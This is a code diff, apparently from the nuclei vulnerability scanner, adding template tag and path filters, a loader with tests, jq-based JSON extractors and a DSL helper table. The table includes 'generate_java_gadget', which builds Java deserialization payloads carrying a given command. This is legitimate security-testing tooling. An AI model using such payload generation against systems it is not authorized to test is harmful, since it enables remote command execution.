alwaysIncludedTemplatesMap: make(map[string]struct{}), + } + + alwaysIncludeTemplates := catalogClient.GetTemplatesPath(config.IncludedTemplates) + for _, tpl := range alwaysIncludeTemplates { + filter.alwaysIncludedTemplatesMap[tpl] = struct{}{} + } + return filter +} + +// Match performs match for path filter on templates and returns final list +func (p *PathFilter) Match(templates []string) map[string]struct{} { + templatesMap := make(map[string]struct{}) + for _, tpl := range templates { + templatesMap[tpl] = struct{}{} + } + for _, template := range p.excludedTemplates { + if _, ok := p.alwaysIncludedTemplatesMap[template]; ok { + continue + } else { + delete(templatesMap, template) + } + } + return templatesMap +} diff --git a/v2/pkg/catalog/loader/filter/tag_filter.go b/v2/pkg/catalog/loader/filter/tag_filter.go new file mode 100644 index 0000000000..59c81d74a0 --- /dev/null +++ b/v2/pkg/catalog/loader/filter/tag_filter.go @@ -0,0 +1,178 @@ +package filter + +import ( + "errors" + "strings" +) + +// TagFilter is used to filter nuclei templates for tag based execution +type TagFilter struct { + allowedTags map[string]struct{} + severities map[string]struct{} + authors map[string]struct{} + block map[string]struct{} + matchAllows map[string]struct{} +} + +// ErrExcluded is returned for execluded templates +var ErrExcluded = errors.New("the template was excluded") + +// Match takes a tag and whether the template was matched from user +// input and returns true or false using a tag filter. +// +// If the tag was specified in deny list, it will not return true +// unless it is explicitly specified by user in includeTags which is the +// matchAllows section. +// +// It returns true if the tag is specified, or false. 
+func (t *TagFilter) Match(tag, author, severity string) (bool, error) { + matchedAny := false + if len(t.allowedTags) > 0 { + _, ok := t.allowedTags[tag] + if ok { + matchedAny = true + } + } + _, ok := t.block[tag] + if ok { + if _, allowOk := t.matchAllows[tag]; allowOk { + return true, nil + } + return false, ErrExcluded + } + if len(t.authors) > 0 { + _, ok = t.authors[author] + if !ok { + return false, nil + } + matchedAny = true + } + if len(t.severities) > 0 { + _, ok = t.severities[severity] + if !ok { + return false, nil + } + matchedAny = true + } + if len(t.allowedTags) == 0 && len(t.authors) == 0 && len(t.severities) == 0 { + return true, nil + } + return matchedAny, nil +} + +// MatchWithAllowedTags takes an addition list of allowed tags +// and returns true if the match was successful. +func (t *TagFilter) MatchWithAllowedTags(allowed []string, tag, author, severity string) (bool, error) { + matchedAny := false + + allowedMap := make(map[string]struct{}) + for _, tag := range allowed { + for _, val := range splitCommaTrim(tag) { + if _, ok := allowedMap[val]; !ok { + allowedMap[val] = struct{}{} + } + } + } + if len(allowedMap) > 0 { + _, ok := allowedMap[tag] + if ok { + matchedAny = true + } + } + _, ok := t.block[tag] + if ok && !matchedAny { + if _, allowOk := t.matchAllows[tag]; allowOk { + return true, nil + } + return false, ErrExcluded + } + if len(t.authors) > 0 { + _, ok = t.authors[author] + if !ok { + return false, nil + } + matchedAny = true + } + if len(t.severities) > 0 { + _, ok = t.severities[severity] + if !ok { + return false, nil + } + matchedAny = true + } + if len(allowedMap) == 0 && len(t.authors) == 0 && len(t.severities) == 0 { + return true, nil + } + return matchedAny, nil +} + +type Config struct { + Tags []string + ExcludeTags []string + Authors []string + Severities []string + IncludeTags []string +} + +// New returns a tag filter for nuclei tag based execution +// +// It takes into account Tags, Severities, Authors, IncludeTags, ExcludeTags. 
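A small usage sketch of the filter, using the constructor defined next; the tag, author and severity values are arbitrary examples:

package main

import (
    "fmt"

    "github.com/projectdiscovery/nuclei/v2/pkg/catalog/loader/filter"
)

func main() {
    f := filter.New(&filter.Config{
        Tags:        []string{"cves"},
        ExcludeTags: []string{"dos"},
    })

    ok, _ := f.Match("cves", "pdteam", "high")
    fmt.Println(ok) // true: "cves" is in the allowed tag list

    ok, err := f.Match("dos", "pdteam", "high")
    fmt.Println(ok, err) // false, "the template was excluded"
}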
+func New(config *Config) *TagFilter { + filter := &TagFilter{ + allowedTags: make(map[string]struct{}), + authors: make(map[string]struct{}), + severities: make(map[string]struct{}), + block: make(map[string]struct{}), + matchAllows: make(map[string]struct{}), + } + for _, tag := range config.ExcludeTags { + for _, val := range splitCommaTrim(tag) { + if _, ok := filter.block[val]; !ok { + filter.block[val] = struct{}{} + } + } + } + for _, tag := range config.Severities { + for _, val := range splitCommaTrim(tag) { + if _, ok := filter.severities[val]; !ok { + filter.severities[val] = struct{}{} + } + } + } + for _, tag := range config.Authors { + for _, val := range splitCommaTrim(tag) { + if _, ok := filter.authors[val]; !ok { + filter.authors[val] = struct{}{} + } + } + } + for _, tag := range config.Tags { + for _, val := range splitCommaTrim(tag) { + if _, ok := filter.allowedTags[val]; !ok { + filter.allowedTags[val] = struct{}{} + } + delete(filter.block, val) + } + } + for _, tag := range config.IncludeTags { + for _, val := range splitCommaTrim(tag) { + if _, ok := filter.matchAllows[val]; !ok { + filter.matchAllows[val] = struct{}{} + } + delete(filter.block, val) + } + } + return filter +} + +func splitCommaTrim(value string) []string { + if !strings.Contains(value, ",") { + return []string{strings.ToLower(value)} + } + splitted := strings.Split(value, ",") + final := make([]string, len(splitted)) + for i, value := range splitted { + final[i] = strings.ToLower(strings.TrimSpace(value)) + } + return final +} diff --git a/v2/pkg/catalog/loader/filter/tag_filter_test.go b/v2/pkg/catalog/loader/filter/tag_filter_test.go new file mode 100644 index 0000000000..6eb3617780 --- /dev/null +++ b/v2/pkg/catalog/loader/filter/tag_filter_test.go @@ -0,0 +1,84 @@ +package filter + +import ( + "testing" + + "github.com/stretchr/testify/require" +) + +func TestTagBasedFilter(t *testing.T) { + config := &Config{ + Tags: []string{"cves", "2021", "jira"}, + } + filter := New(config) + + t.Run("true", func(t *testing.T) { + matched, _ := filter.Match("jira", "pdteam", "low") + require.True(t, matched, "could not get correct match") + }) + t.Run("false", func(t *testing.T) { + matched, _ := filter.Match("consul", "pdteam", "low") + require.False(t, matched, "could not get correct match") + }) + t.Run("not-match-excludes", func(t *testing.T) { + config := &Config{ + ExcludeTags: []string{"dos"}, + } + filter := New(config) + matched, err := filter.Match("dos", "pdteam", "low") + require.False(t, matched, "could not get correct match") + require.Equal(t, ErrExcluded, err, "could not get correct error") + }) + t.Run("match-includes", func(t *testing.T) { + config := &Config{ + Tags: []string{"cves", "fuzz"}, + ExcludeTags: []string{"dos", "fuzz"}, + IncludeTags: []string{"fuzz"}, + } + filter := New(config) + matched, err := filter.Match("fuzz", "pdteam", "low") + require.Nil(t, err, "could not get match") + require.True(t, matched, "could not get correct match") + }) + t.Run("match-author", func(t *testing.T) { + config := &Config{ + Authors: []string{"pdteam"}, + } + filter := New(config) + matched, _ := filter.Match("fuzz", "pdteam", "low") + require.True(t, matched, "could not get correct match") + }) + t.Run("match-severity", func(t *testing.T) { + config := &Config{ + Severities: []string{"high"}, + } + filter := New(config) + matched, _ := filter.Match("fuzz", "pdteam", "high") + require.True(t, matched, "could not get correct match") + }) + t.Run("match-exclude-with-tags", func(t *testing.T) { 
+ config := &Config{ + Tags: []string{"tag"}, + ExcludeTags: []string{"another"}, + } + filter := New(config) + matched, _ := filter.Match("another", "pdteam", "high") + require.False(t, matched, "could not get correct match") + }) + t.Run("match-conditions", func(t *testing.T) { + config := &Config{ + Authors: []string{"pdteam"}, + Tags: []string{"jira"}, + Severities: []string{"high"}, + } + filter := New(config) + matched, _ := filter.Match("jira", "pdteam", "high") + require.True(t, matched, "could not get correct match") + matched, _ = filter.Match("jira", "pdteam", "low") + require.False(t, matched, "could not get correct match") + matched, _ = filter.Match("jira", "random", "low") + require.False(t, matched, "could not get correct match") + matched, _ = filter.Match("consul", "random", "low") + require.False(t, matched, "could not get correct match") + }) +} diff --git a/v2/pkg/catalog/loader/load/load.go b/v2/pkg/catalog/loader/load/load.go new file mode 100644 index 0000000000..391161a7d0 --- /dev/null +++ b/v2/pkg/catalog/loader/load/load.go @@ -0,0 +1,100 @@ +package load + +import ( + "bytes" + "errors" + "io/ioutil" + "os" + "strings" + + "github.com/projectdiscovery/nuclei/v2/pkg/catalog/loader/filter" + "github.com/projectdiscovery/nuclei/v2/pkg/types" + "gopkg.in/yaml.v2" +) + +// Load loads a template by parsing metadata and running +// all tag and path based filters on the template. +func Load(templatePath string, workflow bool, customTags []string, tagFilter *filter.TagFilter) (bool, error) { + f, err := os.Open(templatePath) + if err != nil { + return false, err + } + defer f.Close() + + data, err := ioutil.ReadAll(f) + if err != nil { + return false, err + } + + template := make(map[string]interface{}) + err = yaml.NewDecoder(bytes.NewReader(data)).Decode(template) + if err != nil { + return false, err + } + + info, ok := template["info"] + if !ok { + return false, errors.New("no template info field provided") + } + infoMap, ok := info.(map[interface{}]interface{}) + if !ok { + return false, errors.New("could not get info") + } + + if _, nameOk := infoMap["name"]; !nameOk { + return false, errors.New("no template name field provided") + } + author, ok := infoMap["author"] + if !ok { + return false, errors.New("no template author field provided") + } + severity, ok := infoMap["severity"] + if !ok { + severity = "" + } + + templateTags, ok := infoMap["tags"] + if !ok { + templateTags = "" + } + tagStr := types.ToString(templateTags) + + tags := strings.Split(tagStr, ",") + severityStr := strings.ToLower(types.ToString(severity)) + authors := strings.Split(types.ToString(author), ",") + + matched := false + + _, workflowsFound := template["workflows"] + if !workflowsFound && workflow { + return false, nil + } + if workflow { + return true, nil + } + for _, tag := range tags { + for _, author := range authors { + var match bool + var err error + + if len(customTags) == 0 { + match, err = tagFilter.Match(strings.ToLower(strings.TrimSpace(tag)), strings.ToLower(strings.TrimSpace(author)), severityStr) + } else { + match, err = tagFilter.MatchWithAllowedTags(customTags, strings.ToLower(strings.TrimSpace(tag)), strings.ToLower(strings.TrimSpace(author)), severityStr) + } + if err == filter.ErrExcluded { + return false, filter.ErrExcluded + } + if !matched && match { + matched = true + } + } + } + if !matched { + return false, nil + } + if workflowsFound && !workflow { + return false, nil + } + return true, nil +} diff --git a/v2/pkg/catalog/loader/loader.go 
b/v2/pkg/catalog/loader/loader.go new file mode 100644 index 0000000000..37b75943f4 --- /dev/null +++ b/v2/pkg/catalog/loader/loader.go @@ -0,0 +1,202 @@ +package loader + +import ( + "strings" + + "github.com/projectdiscovery/gologger" + "github.com/projectdiscovery/nuclei/v2/pkg/catalog" + "github.com/projectdiscovery/nuclei/v2/pkg/catalog/loader/filter" + "github.com/projectdiscovery/nuclei/v2/pkg/catalog/loader/load" + "github.com/projectdiscovery/nuclei/v2/pkg/protocols" + "github.com/projectdiscovery/nuclei/v2/pkg/templates" +) + +// Config contains the configuration options for the loader +type Config struct { + Templates []string + Workflows []string + ExcludeTemplates []string + IncludeTemplates []string + + Tags []string + ExcludeTags []string + Authors []string + Severities []string + IncludeTags []string + + Catalog *catalog.Catalog + ExecutorOptions protocols.ExecuterOptions + TemplatesDirectory string +} + +// Store is a storage for loaded nuclei templates +type Store struct { + tagFilter *filter.TagFilter + pathFilter *filter.PathFilter + config *Config + finalTemplates []string + + templates []*templates.Template + workflows []*templates.Template + + preprocessor templates.Preprocessor +} + +// New creates a new template store based on provided configuration +func New(config *Config) (*Store, error) { + // Create a tag filter based on provided configuration + store := &Store{ + config: config, + tagFilter: filter.New(&filter.Config{ + Tags: config.Tags, + ExcludeTags: config.ExcludeTags, + Authors: config.Authors, + Severities: config.Severities, + IncludeTags: config.IncludeTags, + }), + pathFilter: filter.NewPathFilter(&filter.PathFilterConfig{ + IncludedTemplates: config.IncludeTemplates, + ExcludedTemplates: config.ExcludeTemplates, + }, config.Catalog), + } + + // Handle a case with no templates or workflows, where we use base directory + if len(config.Templates) == 0 && len(config.Workflows) == 0 { + config.Templates = append(config.Templates, config.TemplatesDirectory) + } + store.finalTemplates = append(store.finalTemplates, config.Templates...) + return store, nil +} + +// Templates returns all the templates in the store +func (s *Store) Templates() []*templates.Template { + return s.templates +} + +// Workflows returns all the workflows in the store +func (s *Store) Workflows() []*templates.Template { + return s.workflows +} + +// RegisterPreprocessor allows a custom preprocessor to be passed to the store to run against templates +func (s *Store) RegisterPreprocessor(preprocessor templates.Preprocessor) { + s.preprocessor = preprocessor +} + +// Load loads all the templates from a store, performs filtering and returns +// the complete compiled templates for a nuclei execution configuration. +func (s *Store) Load() { + s.templates = s.LoadTemplates(s.finalTemplates) + s.workflows = s.LoadWorkflows(s.config.Workflows) +} + +// ValidateTemplates takes a list of templates and validates them +// erroring out on discovering any faulty templates. 
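A rough wiring sketch for the store described above; the directory is a placeholder and the zero-value ExecuterOptions is only for illustration (a real caller passes fully populated executor options):

package main

import (
    "fmt"

    "github.com/projectdiscovery/nuclei/v2/pkg/catalog"
    "github.com/projectdiscovery/nuclei/v2/pkg/catalog/loader"
    "github.com/projectdiscovery/nuclei/v2/pkg/protocols"
)

func main() {
    dir := "/home/user/nuclei-templates" // placeholder path

    store, err := loader.New(&loader.Config{
        Tags:               []string{"cves"},
        TemplatesDirectory: dir,
        Catalog:            catalog.New(dir),
        ExecutorOptions:    protocols.ExecuterOptions{}, // illustration only
    })
    if err != nil {
        panic(err)
    }
    store.Load() // resolves paths, applies tag/path filters, parses templates
    for _, tpl := range store.Templates() {
        fmt.Println(tpl.ID)
    }
}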
+func (s *Store) ValidateTemplates(templatesList, workflowsList []string) bool { + includedTemplates := s.config.Catalog.GetTemplatesPath(templatesList) + includedWorkflows := s.config.Catalog.GetTemplatesPath(workflowsList) + templatesMap := s.pathFilter.Match(includedTemplates) + workflowsMap := s.pathFilter.Match(includedWorkflows) + + notErrored := true + for k := range templatesMap { + _, err := s.loadTemplate(k, false) + if err != nil { + if strings.Contains(err.Error(), "cannot create template executer") { + continue + } + if err == filter.ErrExcluded { + continue + } + notErrored = false + gologger.Error().Msgf("Error occurred loading template %s: %s\n", k, err) + continue + } + _, err = templates.Parse(k, s.preprocessor, s.config.ExecutorOptions) + if err != nil { + if strings.Contains(err.Error(), "cannot create template executer") { + continue + } + if err == filter.ErrExcluded { + continue + } + notErrored = false + gologger.Error().Msgf("Error occurred parsing template %s: %s\n", k, err) + } + } + for k := range workflowsMap { + _, err := s.loadTemplate(k, true) + if err != nil { + if strings.Contains(err.Error(), "cannot create template executer") { + continue + } + if err == filter.ErrExcluded { + continue + } + notErrored = false + gologger.Error().Msgf("Error occurred loading workflow %s: %s\n", k, err) + } + _, err = templates.Parse(k, s.preprocessor, s.config.ExecutorOptions) + if err != nil { + if strings.Contains(err.Error(), "cannot create template executer") { + continue + } + if err == filter.ErrExcluded { + continue + } + notErrored = false + gologger.Error().Msgf("Error occurred parsing workflow %s: %s\n", k, err) + } + } + return notErrored +} + +// LoadTemplates takes a list of templates and returns paths for them +func (s *Store) LoadTemplates(templatesList []string) []*templates.Template { + includedTemplates := s.config.Catalog.GetTemplatesPath(templatesList) + templatesMap := s.pathFilter.Match(includedTemplates) + + loadedTemplates := make([]*templates.Template, 0, len(templatesMap)) + for k := range templatesMap { + loaded, err := s.loadTemplate(k, false) + if err != nil { + gologger.Warning().Msgf("Could not load template %s: %s\n", k, err) + } + if loaded { + parsed, err := templates.Parse(k, s.preprocessor, s.config.ExecutorOptions) + if err != nil { + gologger.Warning().Msgf("Could not parse template %s: %s\n", k, err) + } else if parsed != nil { + loadedTemplates = append(loadedTemplates, parsed) + } + } + } + return loadedTemplates +} + +// LoadWorkflows takes a list of workflows and returns paths for them +func (s *Store) LoadWorkflows(workflowsList []string) []*templates.Template { + includedWorkflows := s.config.Catalog.GetTemplatesPath(s.config.Workflows) + workflowsMap := s.pathFilter.Match(includedWorkflows) + + loadedWorkflows := make([]*templates.Template, 0, len(workflowsMap)) + for k := range workflowsMap { + loaded, err := s.loadTemplate(k, true) + if err != nil { + gologger.Warning().Msgf("Could not load workflow %s: %s\n", k, err) + } + if loaded { + parsed, err := templates.Parse(k, s.preprocessor, s.config.ExecutorOptions) + if err != nil { + gologger.Warning().Msgf("Could not parse workflow %s: %s\n", k, err) + } else if parsed != nil { + loadedWorkflows = append(loadedWorkflows, parsed) + } + } + } + return loadedWorkflows +} + +func (s *Store) loadTemplate(templatePath string, workflow bool) (bool, error) { + return load.Load(templatePath, workflow, nil, s.tagFilter) +} diff --git a/v2/pkg/catalog/loader/loader_test.go 
b/v2/pkg/catalog/loader/loader_test.go new file mode 100644 index 0000000000..b9f6ab43e2 --- /dev/null +++ b/v2/pkg/catalog/loader/loader_test.go @@ -0,0 +1,40 @@ +package loader + +import ( + "testing" + + "github.com/stretchr/testify/require" +) + +func TestLoadTemplates(t *testing.T) { + store, err := New(&Config{ + Templates: []string{"cves/CVE-2021-21315.yaml"}, + }) + require.Nil(t, err, "could not load templates") + require.Equal(t, []string{"cves/CVE-2021-21315.yaml"}, store.finalTemplates, "could not get correct templates") + + templatesDirectory := "/test" + t.Run("blank", func(t *testing.T) { + store, err := New(&Config{ + TemplatesDirectory: templatesDirectory, + }) + require.Nil(t, err, "could not load templates") + require.Equal(t, []string{templatesDirectory}, store.finalTemplates, "could not get correct templates") + }) + t.Run("only-tags", func(t *testing.T) { + store, err := New(&Config{ + Tags: []string{"cves"}, + TemplatesDirectory: templatesDirectory, + }) + require.Nil(t, err, "could not load templates") + require.Equal(t, []string{templatesDirectory}, store.finalTemplates, "could not get correct templates") + }) + t.Run("tags-with-path", func(t *testing.T) { + store, err := New(&Config{ + Tags: []string{"cves"}, + TemplatesDirectory: templatesDirectory, + }) + require.Nil(t, err, "could not load templates") + require.Equal(t, []string{templatesDirectory}, store.finalTemplates, "could not get correct templates") + }) +} diff --git a/v2/pkg/operators/common/dsl/dsl.go b/v2/pkg/operators/common/dsl/dsl.go new file mode 100644 index 0000000000..8116ef1363 --- /dev/null +++ b/v2/pkg/operators/common/dsl/dsl.go @@ -0,0 +1,285 @@ +package dsl + +import ( + "crypto/md5" + "crypto/sha1" + "crypto/sha256" + "encoding/base64" + "encoding/hex" + "errors" + "fmt" + "html" + "math" + "math/rand" + "net/url" + "regexp" + "strings" + "time" + + "github.com/Knetic/govaluate" + "github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/helpers/deserialization" + "github.com/projectdiscovery/nuclei/v2/pkg/types" + "github.com/spaolacci/murmur3" +) + +const ( + numbers = "1234567890" + letters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ" + withCutSetArgsSize = 2 + withBaseRandArgsSize = 3 + withMaxRandArgsSize = withCutSetArgsSize +) + +var functions = map[string]govaluate.ExpressionFunction{ + "len": func(args ...interface{}) (interface{}, error) { + length := len(types.ToString(args[0])) + return float64(length), nil + }, + "toupper": func(args ...interface{}) (interface{}, error) { + return strings.ToUpper(types.ToString(args[0])), nil + }, + "tolower": func(args ...interface{}) (interface{}, error) { + return strings.ToLower(types.ToString(args[0])), nil + }, + "replace": func(args ...interface{}) (interface{}, error) { + return strings.ReplaceAll(types.ToString(args[0]), types.ToString(args[1]), types.ToString(args[2])), nil + }, + "replace_regex": func(args ...interface{}) (interface{}, error) { + compiled, err := regexp.Compile(types.ToString(args[1])) + if err != nil { + return nil, err + } + return compiled.ReplaceAllString(types.ToString(args[0]), types.ToString(args[2])), nil + }, + "trim": func(args ...interface{}) (interface{}, error) { + return strings.Trim(types.ToString(args[0]), types.ToString(args[2])), nil + }, + "trimleft": func(args ...interface{}) (interface{}, error) { + return strings.TrimLeft(types.ToString(args[0]), types.ToString(args[1])), nil + }, + "trimright": func(args ...interface{}) (interface{}, error) { + return 
strings.TrimRight(types.ToString(args[0]), types.ToString(args[1])), nil + }, + "trimspace": func(args ...interface{}) (interface{}, error) { + return strings.TrimSpace(types.ToString(args[0])), nil + }, + "trimprefix": func(args ...interface{}) (interface{}, error) { + return strings.TrimPrefix(types.ToString(args[0]), types.ToString(args[1])), nil + }, + "trimsuffix": func(args ...interface{}) (interface{}, error) { + return strings.TrimSuffix(types.ToString(args[0]), types.ToString(args[1])), nil + }, + "reverse": func(args ...interface{}) (interface{}, error) { + return reverseString(types.ToString(args[0])), nil + }, + // encoding + "base64": func(args ...interface{}) (interface{}, error) { + sEnc := base64.StdEncoding.EncodeToString([]byte(types.ToString(args[0]))) + + return sEnc, nil + }, + // python encodes to base64 with lines of 76 bytes terminated by new line "\n" + "base64_py": func(args ...interface{}) (interface{}, error) { + sEnc := base64.StdEncoding.EncodeToString([]byte(types.ToString(args[0]))) + return deserialization.InsertInto(sEnc, 76, '\n'), nil + }, + "base64_decode": func(args ...interface{}) (interface{}, error) { + return base64.StdEncoding.DecodeString(types.ToString(args[0])) + }, + "url_encode": func(args ...interface{}) (interface{}, error) { + return url.PathEscape(types.ToString(args[0])), nil + }, + "url_decode": func(args ...interface{}) (interface{}, error) { + return url.PathUnescape(types.ToString(args[0])) + }, + "hex_encode": func(args ...interface{}) (interface{}, error) { + return hex.EncodeToString([]byte(types.ToString(args[0]))), nil + }, + "hex_decode": func(args ...interface{}) (interface{}, error) { + hx, _ := hex.DecodeString(types.ToString(args[0])) + return string(hx), nil + }, + "html_escape": func(args ...interface{}) (interface{}, error) { + return html.EscapeString(types.ToString(args[0])), nil + }, + "html_unescape": func(args ...interface{}) (interface{}, error) { + return html.UnescapeString(types.ToString(args[0])), nil + }, + // hashing + "md5": func(args ...interface{}) (interface{}, error) { + hash := md5.Sum([]byte(types.ToString(args[0]))) + + return hex.EncodeToString(hash[:]), nil + }, + "sha256": func(args ...interface{}) (interface{}, error) { + h := sha256.New() + _, err := h.Write([]byte(types.ToString(args[0]))) + + if err != nil { + return nil, err + } + return hex.EncodeToString(h.Sum(nil)), nil + }, + "sha1": func(args ...interface{}) (interface{}, error) { + h := sha1.New() + _, err := h.Write([]byte(types.ToString(args[0]))) + + if err != nil { + return nil, err + } + return hex.EncodeToString(h.Sum(nil)), nil + }, + "mmh3": func(args ...interface{}) (interface{}, error) { + return fmt.Sprintf("%d", int32(murmur3.Sum32WithSeed([]byte(types.ToString(args[0])), 0))), nil + }, + // search + "contains": func(args ...interface{}) (interface{}, error) { + return strings.Contains(types.ToString(args[0]), types.ToString(args[1])), nil + }, + "regex": func(args ...interface{}) (interface{}, error) { + compiled, err := regexp.Compile(types.ToString(args[0])) + if err != nil { + return nil, err + } + return compiled.MatchString(types.ToString(args[1])), nil + }, + // random generators + "rand_char": func(args ...interface{}) (interface{}, error) { + chars := letters + numbers + bad := "" + if len(args) >= 1 { + chars = types.ToString(args[0]) + } + if len(args) >= withCutSetArgsSize { + bad = types.ToString(args[1]) + } + chars = trimAll(chars, bad) + return chars[rand.Intn(len(chars))], nil + }, + "rand_base": func(args 
...interface{}) (interface{}, error) { + l := 0 + bad := "" + base := letters + numbers + + if len(args) >= 1 { + l = args[0].(int) + } + if len(args) >= withCutSetArgsSize { + bad = types.ToString(args[1]) + } + if len(args) >= withBaseRandArgsSize { + base = types.ToString(args[2]) + } + base = trimAll(base, bad) + return randSeq(base, l), nil + }, + "rand_text_alphanumeric": func(args ...interface{}) (interface{}, error) { + l := 0 + bad := "" + chars := letters + numbers + + if len(args) >= 1 { + l = args[0].(int) + } + if len(args) >= withCutSetArgsSize { + bad = types.ToString(args[1]) + } + chars = trimAll(chars, bad) + return randSeq(chars, l), nil + }, + "rand_text_alpha": func(args ...interface{}) (interface{}, error) { + l := 0 + bad := "" + chars := letters + + if len(args) >= 1 { + l = args[0].(int) + } + if len(args) >= withCutSetArgsSize { + bad = types.ToString(args[1]) + } + chars = trimAll(chars, bad) + return randSeq(chars, l), nil + }, + "rand_text_numeric": func(args ...interface{}) (interface{}, error) { + l := 0 + bad := "" + chars := numbers + + if len(args) >= 1 { + l = args[0].(int) + } + if len(args) >= withCutSetArgsSize { + bad = types.ToString(args[1]) + } + chars = trimAll(chars, bad) + return randSeq(chars, l), nil + }, + "rand_int": func(args ...interface{}) (interface{}, error) { + min := 0 + max := math.MaxInt32 + + if len(args) >= 1 { + min = args[0].(int) + } + if len(args) >= withMaxRandArgsSize { + max = args[1].(int) + } + return rand.Intn(max-min) + min, nil + }, + // Time Functions + "waitfor": func(args ...interface{}) (interface{}, error) { + seconds := args[0].(float64) + time.Sleep(time.Duration(seconds) * time.Second) + return true, nil + }, + // deserialization Functions + "generate_java_gadget": func(args ...interface{}) (interface{}, error) { + gadget := args[0].(string) + cmd := args[1].(string) + + var encoding string + if len(args) > 2 { + encoding = args[2].(string) + } + data := deserialization.GenerateJavaGadget(gadget, cmd, encoding) + return data, nil + }, +} + +// HelperFunctions returns the dsl helper functions +func HelperFunctions() map[string]govaluate.ExpressionFunction { + return functions +} + +// AddHelperFunction allows creation of additiona helper functions to be supported with templates +func AddHelperFunction(key string, value func(args ...interface{}) (interface{}, error)) error { + if _, ok := functions[key]; !ok { + functions[key] = value + return nil + } + return errors.New("duplicate helper function key defined") +} + +func reverseString(s string) string { + runes := []rune(s) + for i, j := 0, len(runes)-1; i < j; i, j = i+1, j-1 { + runes[i], runes[j] = runes[j], runes[i] + } + return string(runes) +} + +func trimAll(s, cutset string) string { + for _, c := range cutset { + s = strings.ReplaceAll(s, string(c), "") + } + return s +} + +func randSeq(base string, n int) string { + b := make([]rune, n) + for i := range b { + b[i] = rune(base[rand.Intn(len(base))]) + } + return string(b) +} diff --git a/v2/pkg/operators/extractors/compile.go b/v2/pkg/operators/extractors/compile.go index b189c3de1f..341340a380 100644 --- a/v2/pkg/operators/extractors/compile.go +++ b/v2/pkg/operators/extractors/compile.go @@ -4,6 +4,8 @@ import ( "fmt" "regexp" "strings" + + "github.com/itchyny/gojq" ) // CompileExtractors performs the initial setup operation on a extractor @@ -28,6 +30,18 @@ func (e *Extractor) CompileExtractors() error { e.KVal[i] = strings.ToLower(kval) } + for _, query := range e.JSON { + query, err := 
gojq.Parse(query) + if err != nil { + return fmt.Errorf("could not parse json: %s", query) + } + compiled, err := gojq.Compile(query) + if err != nil { + return fmt.Errorf("could not compile json: %s", query) + } + e.jsonCompiled = append(e.jsonCompiled, compiled) + } + // Setup the part of the request to match, if any. if e.Part == "" { e.Part = "body" diff --git a/v2/pkg/operators/extractors/extract.go b/v2/pkg/operators/extractors/extract.go index 5fecdcf9f6..58845a8330 100644 --- a/v2/pkg/operators/extractors/extract.go +++ b/v2/pkg/operators/extractors/extract.go @@ -1,6 +1,8 @@ package extractors import ( + "encoding/json" + "github.com/projectdiscovery/nuclei/v2/pkg/types" ) @@ -42,3 +44,41 @@ func (e *Extractor) ExtractKval(data map[string]interface{}) map[string]struct{} } return results } + +// ExtractJSON extracts text from a corpus using JQ queries and returns it +func (e *Extractor) ExtractJSON(corpus string) map[string]struct{} { + results := make(map[string]struct{}) + + var jsonObj interface{} + + err := json.Unmarshal([]byte(corpus), &jsonObj) + + if err != nil { + return results + } + + for _, k := range e.jsonCompiled { + iter := k.Run(jsonObj) + for { + v, ok := iter.Next() + if !ok { + break + } + if _, ok := v.(error); ok { + break + } + var result string + if res, err := types.JSONScalarToString(v); err == nil { + result = res + } else if res, err := json.Marshal(v); err == nil { + result = string(res) + } else { + result = types.ToString(v) + } + if _, ok := results[result]; !ok { + results[result] = struct{}{} + } + } + } + return results +} diff --git a/v2/pkg/operators/extractors/extractors.go b/v2/pkg/operators/extractors/extractors.go index f593a1747d..2542bb0d4c 100644 --- a/v2/pkg/operators/extractors/extractors.go +++ b/v2/pkg/operators/extractors/extractors.go @@ -1,6 +1,10 @@ package extractors -import "regexp" +import ( + "regexp" + + "github.com/itchyny/gojq" +) // Extractor is used to extract part of response using a regex. type Extractor struct { @@ -21,6 +25,11 @@ type Extractor struct { // KVal are the kval to be present in the response headers/cookies KVal []string `yaml:"kval,omitempty"` + // JSON are the json pattern required to be present in the response + JSON []string `yaml:"json"` + // jsonCompiled is the compiled variant + jsonCompiled []*gojq.Code + // Part is the part of the request to match // // By default, matching is performed in request body. @@ -37,12 +46,15 @@ const ( RegexExtractor ExtractorType = iota + 1 // KValExtractor extracts responses with key:value KValExtractor + // JSONExtractor extracts responses with json + JSONExtractor ) // ExtractorTypes is an table for conversion of extractor type from string. var ExtractorTypes = map[string]ExtractorType{ "regex": RegexExtractor, "kval": KValExtractor, + "json": JSONExtractor, } // GetType returns the type of the matcher diff --git a/v2/pkg/operators/operators.go b/v2/pkg/operators/operators.go index 87886e64d2..2497fa494a 100644 --- a/v2/pkg/operators/operators.go +++ b/v2/pkg/operators/operators.go @@ -162,3 +162,21 @@ func (r *Operators) Execute(data map[string]interface{}, match MatchFunc, extrac } return nil, false } + +// ExecuteInternalExtractors executes internal dynamic extractors +func (r *Operators) ExecuteInternalExtractors(data map[string]interface{}, extract ExtractFunc) map[string]interface{} { + dynamicValues := make(map[string]interface{}) + + // Start with the extractors first and evaluate them. 
+ for _, extractor := range r.Extractors { + if !extractor.Internal { + continue + } + for match := range extract(data, extractor) { + if _, ok := dynamicValues[extractor.Name]; !ok { + dynamicValues[extractor.Name] = match + } + } + } + return dynamicValues +} diff --git a/v2/pkg/output/format_screen.go b/v2/pkg/output/format_screen.go index 2a57a88fb0..cee106d4d4 100644 --- a/v2/pkg/output/format_screen.go +++ b/v2/pkg/output/format_screen.go @@ -54,7 +54,7 @@ func (w *StandardWriter) formatScreen(output *ResultEvent) []byte { if len(output.Metadata) > 0 { builder.WriteString(" [") - var first bool = true + first := true for name, value := range output.Metadata { if !first { builder.WriteRune(',') diff --git a/v2/pkg/output/output.go b/v2/pkg/output/output.go index 2fac10fd7f..ffe1b180b4 100644 --- a/v2/pkg/output/output.go +++ b/v2/pkg/output/output.go @@ -54,6 +54,8 @@ type InternalWrappedEvent struct { type ResultEvent struct { // TemplateID is the ID of the template for the result. TemplateID string `json:"templateID"` + // TemplatePath is the path of template + TemplatePath string `json:"-"` // Info contains information block of the template for the result. Info map[string]interface{} `json:"info,inline"` // MatcherName is the name of the matcher matched if any. @@ -82,6 +84,8 @@ type ResultEvent struct { Timestamp time.Time `json:"timestamp"` // Interaction is the full details of interactsh interaction. Interaction *server.Interaction `json:"interaction,omitempty"` + + FileToIndexPosition map[string]int `json:"-"` } // NewStandardWriter creates a new output writer based on user configurations diff --git a/v2/pkg/progress/progress.go b/v2/pkg/progress/progress.go index 0ec2626f4a..220ff49a68 100644 --- 